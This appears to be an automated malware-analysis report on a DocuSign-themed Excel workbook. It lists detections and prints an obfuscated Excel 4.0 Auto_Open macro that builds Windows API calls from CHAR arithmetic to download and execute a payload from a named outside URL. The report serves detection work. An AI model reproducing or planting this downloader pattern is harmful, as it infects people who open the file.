Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros with an Auto_Open entry, which is a critical finding indicating automatic execution upon opening. The macros utilize dangerous functions like RUN and CONCATENATE, and reference the URL https://myscape.in/ds/161120.gif. This suggests the macro is designed to download and execute a secondary payload from the specified URL, aligning with the behavior of a downloader malware.
Heuristics (7)
- ClamAV: Doc.Downloader.Docusign0521-9864805-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
- Excel 4.0 Auto_Open defined name [critical, OLE_XLM_AUTOOPEN_DEFINEDNAME]: oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs [critical, OLE_XLM_DANGEROUS_FN]: Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- URL reconstructed from XLM cell array (1 URL) [critical, OLE_XLM_CELL_ARRAY_URL]: Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
- Reference to ShellExecute API [high, SC_STR_SHELLEXEC]: Reference to ShellExecute API
- Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]: Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://myscape.in/ds/161120.gif (referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt (sha256: c7e4e7ed3c1ce4a0357cad7ea2d4765567912ff9637c55ef23ac64833b3a62a6) | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6274 bytes |
Preview script: first 1,000 lines of the extracted script
' 0085 16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - DocuSig
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - 8
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d 8 !A40
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' 8 ,A51,RUN(R59),""
' 8 ,R59,RUN( 8 !D50),""
' 8 ,B200,"https://"&C201&D202&E203,""
' 8 ,BN62,"CONCATENATE(BN63,BN64,BN65,BN66,BN67,BN68,BN69,BN70,BN71)",""
' 8 ,BN63,CHAR(BO63+BP63+BQ63),""
' 8 ,BN64,CHAR(BO64+BP64+BQ64),""
' 8 ,BN65,CHAR(BO65+BP65+BQ65),""
' 8 ,BN66,CHAR(BO66+BP66-BQ66),""
' 8 ,BN67,CHAR(BO67+BP67-BQ67),""
' 8 ,BN68,CHAR(BO68+BP68-BQ68),""
' 8 ,BN69,CHAR(BO69-BP69+BQ69),""
' 8 ,BN70,CHAR(BO70-BP70+BQ70),""
' 8 ,BN71,CHAR(BO71-BP71+BQ71),""
' 8 ,CV74,"CONCATENATE(CV77,CV78,CV79,CV80&"D"&CV82,CV83,CV84,CV85,CV86,CV87,CV88)",""
' 8 ,CV75,CHAR(CW75+CX75+CY75),""
' 8 ,CV76,CHAR(CW76+CX76+CY76),""
' 8 ,BN77,"CONCATENATE(BN78,BN79,BN80,BN81,BN82,BN83,BN84)",""
' 8 ,CV77,CHAR(101),""
' 8 ,BN78,CHAR(BO78-BP78-BQ78),""
' 8 ,CV78,CHAR(CW78+CX78+CY78),""
' 8 ,BN79,CHAR(BO79-BP79-BQ79),""
' 8 ,CV79,CHAR(CW79-CX79-CY79),""
' 8 ,BN80,CHAR(BO80-BP80-BQ80),""
' 8 ,CV80,CHAR(CW80-CX80-CY80),""
' 8 ,BN81,CHAR(BO81-BP81+BQ81),""
' 8 ,CV81,CHAR(CW81-CX81-CY81),""
' 8 ,BN82,CHAR(BO82-BP82+BQ82),""
' 8 ,BY82,CONCATENATE(BY85&BY86&BY87&BY88),""
' 8 ,CV82,CHAR(CW82-CX82-CY82),""
' 8 ,BN83,CHAR(BO83-BP83+BQ83),""
' 8 ,BY83,CHAR(BZ83+CA83+CB83),""
' 8 ,CV83,CHAR(CW83+CX83-CY83),""
' 8 ,BN84,CHAR(BO84-BP84+BQ84),""
' 8 ,BY84,CHAR(BZ84+CA84+CB84),""
' 8 ,CV84,CHAR(CW84+CX84-CY84),""
' 8 ,BY85,CA85,""
' 8 ,CV85,CHAR(99),""
' 8 ,BY86,CHAR(BZ86+CA86+CB86),""
' 8 ,CV86,CHAR(CW86+CX86-CY86),""
' 8 ,BY87,CHAR(BZ87+CA87+CB87),""
' 8 ,CV87,CHAR(CW87-CX87+CY87),""
' 8 ,BY88,CHAR(BZ88+CA88+CB88),""
' 8 ,CV88,CHAR(CW88-CX88+CY88),""
' 8 ,BY89,CHAR(BZ89+CA89+CB89),""
' 8 ,CV89,CHAR(CW89-CX89+CY89),""
' 8 ,BY90,CHAR(BZ90+CA90+CB90),""
' 8 ,CV90,CHAR(CW90-CX90+CY90),""
' 8 ,BN91,"CONCATENATE(BN92,BN93,BN94,BN95,BN96,BN97,BN98,BN99,BN100,BN101,BN102,BN103,BN104)",""
' 8 ,BN92,[],""
' 8 ,BN93,[],""
' 8 ,BN94,[],""
' 8 ,BS94,CONCATENATE(BS95&BS96&BS97&BS98),""
' 8 ,BN95,[],""
' 8 ,BS95,CHAR(BT95+BU95-BV95),""
' 8 ,BN96,[],""
' 8 ,BS96,CHAR(BT96+BU96-BV96),""
' 8 ,BN97,[],""
' 8 ,BS97,CHAR(BT97-BU97+BV97),""
' 8 ,BN98,[],""
' 8 ,BS98,CHAR(BT98-BU98+BV98),""
' 8 ,BN99,[],""
' 8 ,BN100,[],""
' 8 ,BN101,[],""
' 8 ,BN102,[],""
' 8 ,BN103,[],""
' 8 ,BN104,[],""
' 8 ,BS104,"CONCATENATE(BS106,BS107,BS108,BS109,BS110)",""
' 8 ,BS105,CHAR(BT105+BU105+BV105),""
' 8 ,BS106,CHAR(BT106+BU106+BV106),""
' 8 ,BS107,CHAR(BT107+BU107+BV107),""
' 8 ,BS108,CHAR(BT108-BU108-BV108),""
' 8 ,BS109,CHAR(BT109-BU109-BV109),""
' 8 ,BS110,CHAR(BT110-BU110-BV110),""
' 8 ,BR126,CONCATENATE(BR127&BR128&BR129&BR130&BR131&BR132&BR133),""
' 8 ,BR127,CHAR(BS127+BT127+BU127),""
' 8 ,BR128,CHAR(BS128+BT128+BU128),""
' 8 ,BR129,CHAR(BS129+BT129+BU129),""
' 8 ,BR130,CHAR(BS130+BT130+BU130),""
' 8 ,BR131,CHAR(BS131-BT131-BU131),""
' 8 ,BR132,CHAR(BS132-BT132-BU132),""
' 8 ,BR133,CHAR(BS133-BT133-BU133),""
' 8 ,DH16,"CONCATENATE("S"&DH18,DH19,DH20,DH21,DH22&X94)",""
' 8 ,DH17,CHAR(DI17+DJ17+DK17),""
' 8 ,DH18,CHAR(DI18+DJ18+DK18),""
' 8 ,DH19,CHAR(DI19+DJ19+DK19),""
' 8 ,DH20,CHAR(DI20-DJ20-DK20),""
' 8 ,DH21,CHAR(DI21-DJ21-DK21),""
' 8 ,DH22,CHAR(DI22-DJ22-DK22),""
' 8 ,DE31,CONCATENATE(DE34&DE35&DE36&DE37),""
' 8 ,DE32,CHAR(DF32+DG32+DH32),""
' 8 ,DE33,CHAR(DF33+DG33+DH33),""
' 8 ,DE34,CHAR(DF34+DG34+DH34),""
' 8 ,DE35,CHAR(DF35+DG35+DH35),""
' 8 ,DE36,CHAR(DF36-DG36-DH36),""
' 8 ,DE37,CHAR(DF37-DG37-DH37),""
' 8 ,DE38,CHAR(DF38-DG38+DH38),""
' 8 ,DE39,CHAR(DF39-DG39+DH39),""
' 8 ,E60,"CONCATENATE("R"&E63,E64,E65,E66&"n"&E68,E69,E70,E71,E72,E73&"F"&E75,E76,E77,E78)",""
' 8 ,E61,CHAR(F61+G61+H61),""
' 8 ,E62,CHAR(82),""
' 8 ,E63,CHAR(F63+G63+H63),""
' 8 ,E64,CHAR(F64-G64-H64),""
' 8 ,E65,CHAR(F65-G65-H65),""
' 8 ,E66,CHAR(F66-G66-H66),""
' 8 ,E67,CHAR(F67+G67-H67),""
' 8 ,E68,CHAR(F68+G68-H68),""
' 8 ,E69,CHAR(F69+G69-H69),""
' 8 ,E70,CHAR(F70-G70+H70),""
' 8 ,E71,CHAR(F71-G71+H71),""
' 8 ,E72,CHAR(F72-G72+H72),""
' 8 ,E73,CHAR(111),""
' 8 ,E74,CHAR(F74+G74+H74),""
' 8 ,E75,CHAR(F75+G75+H75),""
' 8 ,E76,CHAR(F76-G76-H76),""
' 8 ,E77,CHAR(F77-G77-H77),""
' 8 ,E78,CHAR(F78-G78-H78),""
' 8 ,X94,"CONCATENATE(X95,X96,X97,X98,X99,X100&"A")",""
' 8 ,X95,CHAR(Y95-Z95-BA95),""
' 8 ,X96,CHAR(Y96-Z96+BA96),""
' 8 ,X97,CHAR(Y97-Z97+BA97),""
' 8 ,X98,CHAR(Y98-Z98+BA98),""
' 8 ,X99,CHAR(Y99+Z99-BA99),""
' 8 ,X100,CHAR(Y100+Z100-BA100),""
' 8 ,X101,CHAR(Y101+Z101-BA101),""
' 8 ,D50,"CALL("Ke"& 8 !DE31&"32","Cr"& DocuSig!CV74&"yA","JCJ", DocuSig!BN62,0)",""
' 8 ,D51,RUN(D55),""
' 8 ,D55,"CALL("Ke"& DocuSig!BY82&"32","Cr"& DocuSig!CV74&"yA","JCJ", DocuSig!BN62& DocuSig!BN77,0)",""
' 8 ,D56,RUN( 8 !DP72),""
' 8 ,DP72,"CALL("U"& DocuSig!BS104,"U"& 8 !E60,"IICCII",0, 8 !B200, DocuSig!BN62& DocuSig!BN77& DocuSig!BN91,0,0)",""
' 8 ,DP73,CALL(DP82),""
' 8 ,DP82,"CALL( DocuSig!BR126, 8 !DH16,"IICCCCI",0, DocuSig!BS94, DocuSig!BN62& DocuSig!BN77& DocuSig!BN91,,0,0)",""
' 8 ,DP83,HALT(),""